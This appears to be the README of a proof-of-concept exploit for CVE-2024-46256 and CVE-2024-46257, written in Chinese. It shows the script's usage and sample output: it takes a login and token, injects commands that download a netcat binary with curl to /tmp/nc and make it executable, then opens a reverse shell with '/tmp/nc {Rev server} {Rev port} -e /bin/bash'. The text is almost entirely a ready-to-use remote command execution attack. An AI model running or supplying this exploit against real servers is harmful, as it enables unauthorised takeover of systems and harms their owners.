POC_CVE-2024-46256
CVE-2024-46256 和 CVE-2024-46257 是同一个 POC,只需更改 provider 参数。
注意
有时 nc 文件无法在服务器上执行,或者无法执行命令!
安装依赖
pip install requests
运行漏洞利用
python3 POC_CVE-2024-46256.py
[+] 目标类型 (IP/主机)? (i/h): i
[+] 输入 IP 或主机: {IP/HOST}
[+] 输入端口: {PORT}
[+] 输入用户名: {USERNAME}
[+] 输入密码: {PASS}
[+] 获取到的令牌: {自动获取的令牌}
[+] 发送载荷: curl https://raw.githubusercontent.com/yunchih/static-binaries/master/nc -o /tmp/nc
[+] 命令已执行: curl https://raw.githubusercontent.com/yunchih/static-binaries/master/nc -o /tmp/nc
[+] 发送载荷: chmod +x /tmp/nc
[+] 命令已执行: chmod +x /tmp/nc
[+] 目标存在漏洞!
[+] 继续进行反弹 Shell?(y/n): y
[+] 输入反弹 Shell IP: {Rev server}
[+] 输入反弹 Shell 端口: {Rev port}
[+] 命令已执行: /tmp/nc {Rev server} {Rev port} -e /bin/bash
[+] 反弹 Shell 命令已执行!